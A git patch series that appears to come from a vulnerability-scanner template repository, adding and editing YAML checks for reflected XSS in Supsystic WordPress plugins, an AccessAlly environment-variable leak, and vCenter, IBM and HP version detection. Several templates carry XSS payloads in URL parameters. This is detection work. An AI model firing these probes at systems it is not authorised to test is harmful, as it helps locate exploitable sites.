0000000000..f9769d9d9b --- /dev/null +++ b/cves/2021/CVE-2021-24275.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24275 + +info: + name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From f122f2c7b387bfd287aa0d106ee93c9c8be92fb7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 Sep 2021 17:04:46 +0000 Subject: [PATCH 41/67] Auto Generated CVE annotations [Tue Sep 28 17:04:46 UTC 2021] :robot: --- cves/2021/CVE-2021-24275.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml index f9769d9d9b..5590f033eb 100644 --- a/cves/2021/CVE-2021-24275.yaml +++ b/cves/2021/CVE-2021-24275.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24275 info: name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK - severity: low + severity: medium reference: - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24275 + cwe-id: CWE-79 + description: "The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From a484d974a19d0500d400d0a5d745379be135382a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 Sep 2021 22:37:40 +0530 Subject: [PATCH 42/67] Create CVE-2021-24276.yaml --- cves/2021/CVE-2021-24276.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24276.yaml diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml new file mode 100644 index 0000000000..28ecf01802 --- /dev/null +++ b/cves/2021/CVE-2021-24276.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24276 + +info: + name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 0b79b925c9cbaeaba3e69018d4758ff8abf9d3bb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 Sep 2021 17:08:48 +0000 Subject: [PATCH 43/67] Auto Generated CVE annotations [Tue Sep 28 17:08:48 UTC 2021] :robot: --- cves/2021/CVE-2021-24276.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml index 28ecf01802..3122936119 100644 --- a/cves/2021/CVE-2021-24276.yaml +++ b/cves/2021/CVE-2021-24276.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24276 info: name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK - severity: low + severity: medium reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24276 + cwe-id: CWE-79 + description: "The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From 48f33d66f49af211560d93fc3d475926a34b30b4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 Sep 2021 22:41:24 +0530 Subject: [PATCH 44/67] Update CVE-2021-24276.yaml --- cves/2021/CVE-2021-24276.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml index 3122936119..c79a5f9b01 100644 --- a/cves/2021/CVE-2021-24276.yaml +++ b/cves/2021/CVE-2021-24276.yaml @@ -18,7 +18,7 @@ requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' matchers-condition: and matchers: From b4ea85bcb7a95cd74ec07297d9a2bfa870710622 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 Sep 2021 22:41:56 +0530 Subject: [PATCH 45/67] Create CVE-2021-24274.yaml --- cves/2021/CVE-2021-24274.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24274.yaml diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml new file mode 100644 index 0000000000..4e6912b22c --- /dev/null +++ b/cves/2021/CVE-2021-24274.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24274 + +info: + name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 53651864fc8d1a6967f30d05493d98c3d307a0fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 Sep 2021 17:13:05 +0000 Subject: [PATCH 46/67] Auto Generated CVE annotations [Tue Sep 28 17:13:05 UTC 2021] :robot: --- cves/2021/CVE-2021-24274.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml index 4e6912b22c..713ecbfab5 100644 --- a/cves/2021/CVE-2021-24274.yaml +++ b/cves/2021/CVE-2021-24274.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24274 info: name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK - severity: low + severity: medium reference: - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24274 + cwe-id: CWE-79 + description: "The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From 23d3993c460a6118cde203df4ad5855be60360e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 29 Sep 2021 00:18:37 +0530 Subject: [PATCH 47/67] Update CVE-2021-24226.yaml --- cves/2021/CVE-2021-24226.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index fd84fbc0af..071b117a42 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -4,15 +4,16 @@ info: name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage author: dhiyaneshDK severity: high + description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. reference: - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 - tags: wordpress,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2021-24226 cwe-id: CWE-200 - description: "In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required." + tags: wordpress,cves,cve2021,wp-plugin requests: - method: GET @@ -25,6 +26,7 @@ requests: words: - '<div id="accessally-testing-data"' condition: and + part: body - type: status status: From b1d6874462c02ffef14261b2919ad6e4d3e1c4df Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 29 Sep 2021 00:20:48 +0530 Subject: [PATCH 48/67] Update CVE-2021-24274.yaml --- cves/2021/CVE-2021-24274.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml index 713ecbfab5..ecb34605e2 100644 --- a/cves/2021/CVE-2021-24274.yaml +++ b/cves/2021/CVE-2021-24274.yaml @@ -4,27 +4,27 @@ info: name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue reference: - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d - tags: wordpress,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24274 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24274 cwe-id: CWE-79 - description: "The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' + - '</script><script>alert(document.domain)</script>' condition: and - type: status From c0912f3a0809b1a64904bf195ea1ef6f91a01c75 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 29 Sep 2021 00:21:25 +0530 Subject: [PATCH 49/67] Update CVE-2021-24226.yaml --- cves/2021/CVE-2021-24226.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index 071b117a42..2548bcc24e 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.50 cve-id: CVE-2021-24226 cwe-id: CWE-200 - tags: wordpress,cves,cve2021,wp-plugin + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET From 58e6ee07a94826c8547751bf588809bbe967db0a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 29 Sep 2021 00:22:52 +0530 Subject: [PATCH 50/67] Update CVE-2021-24275.yaml --- cves/2021/CVE-2021-24275.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml index 5590f033eb..625ef74197 100644 --- a/cves/2021/CVE-2021-24275.yaml +++ b/cves/2021/CVE-2021-24275.yaml @@ -4,27 +4,27 @@ info: name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. reference: - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - tags: wordpress,cves,cve2021 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24275 cwe-id: CWE-79 - description: "The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' + - '</script><script>alert(document.domain)</script>' condition: and - type: status From aac4c689b5b6ca091348016cafda986001c060c1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Wed, 29 Sep 2021 00:24:48 +0530 Subject: [PATCH 51/67] Update CVE-2021-24276.yaml --- cves/2021/CVE-2021-24276.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml index c79a5f9b01..0e7cc9ec1f 100644 --- a/cves/2021/CVE-2021-24276.yaml +++ b/cves/2021/CVE-2021-24276.yaml @@ -4,28 +4,28 @@ info: name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c - tags: wordpress,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24276 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24276 cwe-id: CWE-79 - description: "The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' - condition: and + - '</script><script>alert(document.domain)</script>' + part: body - type: status status: From 5bfb54e757e5ba1f2707c9ced4c55d60464d4a41 Mon Sep 17 00:00:00 2001 From: eric-louhi <eric.louhi@expanseinc.com> Date: Tue, 28 Sep 2021 16:02:26 -0400 Subject: [PATCH 52/67] Added vCenter version detection template --- technologies/vcenter-version-detect.yaml | 103 +++++++++++++++++++++++ 1 file changed, 103 insertions(+) create mode 100644 technologies/vcenter-version-detect.yaml diff --git a/technologies/vcenter-version-detect.yaml b/technologies/vcenter-version-detect.yaml new file mode 100644 index 0000000000..45bb85b039 --- /dev/null +++ b/technologies/vcenter-version-detect.yaml @@ -0,0 +1,103 @@ +id: vcenter-version-detect + +info: + name: vcenter-version-detect + author: elouhi + severity: info + description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information + reference: + - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ + tags: tech,vcenter,vmware +requests: + - raw: + - | + POST /sdk/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + <?xml version="1.0" encoding="UTF-8"?> + <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> + <soap:Header> + <operationID>00000001-00000001</operationID> + </soap:Header> + <soap:Body> + <RetrieveServiceContent xmlns="urn:internalvim25"> + <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this> + </RetrieveServiceContent> + </soap:Body> + </soap:Envelope> + + matchers: + - type: status + status: + - 200 + + extractors: + - type: regex + name: name + part: body + group: 1 + regex: + - "<name>(.*?)</name>" + + - type: regex + name: version + part: body + group: 1 + regex: + - "<version>(.*?)</version>" + + - type: regex + name: build + part: body + group: 1 + regex: + - "<build>(.*?)</build>" + + - type: regex + name: localeVersion + part: body + group: 1 + regex: + - "<localeVersion>(.*?)</localeVersion>" + + + - type: regex + name: localeBuild + part: body + group: 1 + regex: + - "<localeBuild>(.*?)</localeBuild>" + + + - type: regex + name: osType + part: body + group: 1 + regex: + - "<osType>(.*?)</osType>" + + - type: regex + name: productLineId + part: body + group: 1 + regex: + - "<productLineId>(.*?)</productLineId>" + + - type: regex + name: apiType + part: body + group: 1 + regex: + - "<apiType>(.*?)</apiType>" + + - type: regex + name: apiVersion + part: body + group: 1 + regex: + - "<apiVersion>(.*?)</apiVersion>" From a62d9176bce0063ed757d05ecd4c66aac9cc6ab2 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 29 Sep 2021 02:40:45 +0530 Subject: [PATCH 53/67] severity update --- exposed-panels/cerebro-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml index 9e315b83e2..88c17dfd12 100644 --- a/exposed-panels/cerebro-panel.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -3,7 +3,7 @@ id: cerebro-panel info: name: Cerebro Panel author: huowuzhao,elder tao - severity: high + severity: info reference: https://github.com/lmenezes/cerebro tags: panel,cerebro From 60117015073fd117abb3969003fbe607494f13c9 Mon Sep 17 00:00:00 2001 From: TheConciergeDev <65483817+TheConciergeDev@users.noreply.github.com> Date: Wed, 29 Sep 2021 11:18:09 +0200 Subject: [PATCH 54/67] renamed file the second dash was a unicode value -> "\u2013" instead --- cves/2018/{CVE-2018–9845.yaml => CVE-2018-9845.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018–9845.yaml => CVE-2018-9845.yaml} (100%) diff --git a/cves/2018/CVE-2018–9845.yaml b/cves/2018/CVE-2018-9845.yaml similarity index 100% rename from cves/2018/CVE-2018–9845.yaml rename to cves/2018/CVE-2018-9845.yaml From cf6e0a1c61a9771791d8488a85930986484f0491 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 29 Sep 2021 16:33:26 +0530 Subject: [PATCH 55/67] Update tidb-unauth.yaml --- network/tidb-unauth.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml index 8bdf9d9601..ec0dc15c58 100644 --- a/network/tidb-unauth.yaml +++ b/network/tidb-unauth.yaml @@ -4,6 +4,8 @@ info: name: Unauth TiDB Disclosure author: lu4nx severity: high + metadata: + zoomeye-dork: tidb +port:"4000" tags: network,tidb network: From 3b88f47042949b3cff3412fc1860876bd20204ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 29 Sep 2021 16:36:51 +0530 Subject: [PATCH 56/67] Update and rename default-ibm-http-server.yaml to ibm-http-server.yaml --- ...fault-ibm-http-server.yaml => ibm-http-server.yaml} | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) rename technologies/{default-ibm-http-server.yaml => ibm-http-server.yaml} (70%) diff --git a/technologies/default-ibm-http-server.yaml b/technologies/ibm-http-server.yaml similarity index 70% rename from technologies/default-ibm-http-server.yaml rename to technologies/ibm-http-server.yaml index 8961433dbc..6055f409b3 100644 --- a/technologies/default-ibm-http-server.yaml +++ b/technologies/ibm-http-server.yaml @@ -1,8 +1,8 @@ -id: default-ibm-http-server +id: ibm-http-server info: name: Default IBM HTTP Server - author: dhiyaneshDK + author: dhiyaneshDK,pussycat0x severity: info reference: https://www.shodan.io/search?query=http.title%3A%22IBM-HTTP-Server%22 tags: tech,ibm @@ -21,3 +21,9 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - "IBM HTTP Server ([0-9.]+)" From b5eef6d441597317213cf111c36999c9d0bd9b49 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 29 Sep 2021 16:37:04 +0530 Subject: [PATCH 57/67] Delete ibm-http-server-detect.yaml --- technologies/ibm-http-server-detect.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 technologies/ibm-http-server-detect.yaml diff --git a/technologies/ibm-http-server-detect.yaml b/technologies/ibm-http-server-detect.yaml deleted file mode 100644 index b913804dcd..0000000000 --- a/technologies/ibm-http-server-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: ibm-http-server -info: - name: IBM http server - author: pussycat0x - severity: info - metadata: - shodan-dork: 'http.title:"ibm"' - tags: tech, ibm -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - "IBM HTTP Server" - extractors: - - type: regex - part: body - regex: - - "IBM HTTP Server ([0-9.]+)" \ No newline at end of file From 1858d54cd88c7d9b0517fdc570fe0f2e54f2f2a8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 29 Sep 2021 17:07:01 +0530 Subject: [PATCH 58/67] Update ibm-http-server.yaml --- technologies/ibm-http-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/ibm-http-server.yaml b/technologies/ibm-http-server.yaml index 6055f409b3..520d40af00 100644 --- a/technologies/ibm-http-server.yaml +++ b/technologies/ibm-http-server.yaml @@ -26,4 +26,4 @@ requests: - type: regex part: body regex: - - "IBM HTTP Server ([0-9.]+)" + - "IBM HTTP Server ([0-9.]+)" From d4690b58499a157a8b5c8120455e102e25f24b54 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 29 Sep 2021 18:14:28 +0530 Subject: [PATCH 59/67] misc update --- dns/azure-takeover-detection.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 68d9a0a9eb..e6de245138 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -4,13 +4,8 @@ info: name: Azure takeover detection author: pdteam severity: high - tags: dns,takeover - reference: - - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details. - -# Update the list with more CNAMEs related to Azure -# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. -# Do not report this without claiming the CNAME. + tags: dns,takeover,azure + reference: https://godiego.co/posts/STO/ dns: - name: "{{FQDN}}" @@ -40,6 +35,7 @@ dns: - "search.windows.net" - "servicebus.windows.net" - "visualstudio.com" + - type: word words: - "NXDOMAIN" From c86d5e518ddabfc3de1f4220fefeba12eebdbf56 Mon Sep 17 00:00:00 2001 From: eric-louhi <eric.louhi@expanseinc.com> Date: Wed, 29 Sep 2021 09:26:43 -0400 Subject: [PATCH 60/67] Added an additional matcher for vcenter-version-detect.yaml --- technologies/vcenter-version-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/vcenter-version-detect.yaml b/technologies/vcenter-version-detect.yaml index 45bb85b039..29b9609e34 100644 --- a/technologies/vcenter-version-detect.yaml +++ b/technologies/vcenter-version-detect.yaml @@ -31,11 +31,17 @@ requests: </soap:Body> </soap:Envelope> + matchers-condition: and matchers: - type: status status: - 200 + - type: word + part: body + words: + - ha-folder-root + extractors: - type: regex name: name From 5af657ad03463d3d2ef65a3c82d6211172e09e0c Mon Sep 17 00:00:00 2001 From: eric-louhi <eric.louhi@expanseinc.com> Date: Wed, 29 Sep 2021 09:32:51 -0400 Subject: [PATCH 61/67] Renamed yaml --- ...center-version-detect.yaml => vmware-version-detect.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename technologies/{vcenter-version-detect.yaml => vmware-version-detect.yaml} (96%) diff --git a/technologies/vcenter-version-detect.yaml b/technologies/vmware-version-detect.yaml similarity index 96% rename from technologies/vcenter-version-detect.yaml rename to technologies/vmware-version-detect.yaml index 29b9609e34..eccf5ef799 100644 --- a/technologies/vcenter-version-detect.yaml +++ b/technologies/vmware-version-detect.yaml @@ -1,12 +1,13 @@ -id: vcenter-version-detect +id: vmware-version-detect info: - name: vcenter-version-detect + name: vmware-version-detect author: elouhi severity: info description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information reference: - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ + - https://svn.nmap.org/nmap/scripts/vmware-version.nse tags: tech,vcenter,vmware requests: - raw: From 1e088e2c8c262ee4c837c7ab2e53aef47222da10 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 30 Sep 2021 00:02:01 +0530 Subject: [PATCH 62/67] Update and rename hp-media-vault.yaml to hp-media-vault-detect.yaml --- ...-media-vault.yaml => hp-media-vault-detect.yaml} | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) rename technologies/{hp-media-vault.yaml => hp-media-vault-detect.yaml} (67%) diff --git a/technologies/hp-media-vault.yaml b/technologies/hp-media-vault-detect.yaml similarity index 67% rename from technologies/hp-media-vault.yaml rename to technologies/hp-media-vault-detect.yaml index 58a876747d..cc099f1791 100644 --- a/technologies/hp-media-vault.yaml +++ b/technologies/hp-media-vault-detect.yaml @@ -1,21 +1,24 @@ id: hp-media-vault-detect info: - name: HP Media Vault + name: HP Media Vault Detect author: pussycat0x severity: info metadata: fofa-dork: 'app="HP-Media-Vault-Media-Server"' - tags: tech, hp + tags: tech,hp + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - - "<title>HP Media" - condition: and + - "<title>HP Media Vault" + part: body + - type: status status: - - 200 \ No newline at end of file + - 200 From 7de80aa554370f6f4b7bbeccfcf22a03940863cf Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 30 Sep 2021 00:05:19 +0530 Subject: [PATCH 63/67] Delete text.txt --- text.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 text.txt diff --git a/text.txt b/text.txt deleted file mode 100644 index e69de29bb2..0000000000 From 04fcd5b5e716ca4c7bb6351a554769ef834a9b3c Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 30 Sep 2021 00:19:32 +0530 Subject: [PATCH 64/67] Update vmware-version-detect.yaml --- technologies/vmware-version-detect.yaml | 64 +++---------------------- 1 file changed, 6 insertions(+), 58 deletions(-) diff --git 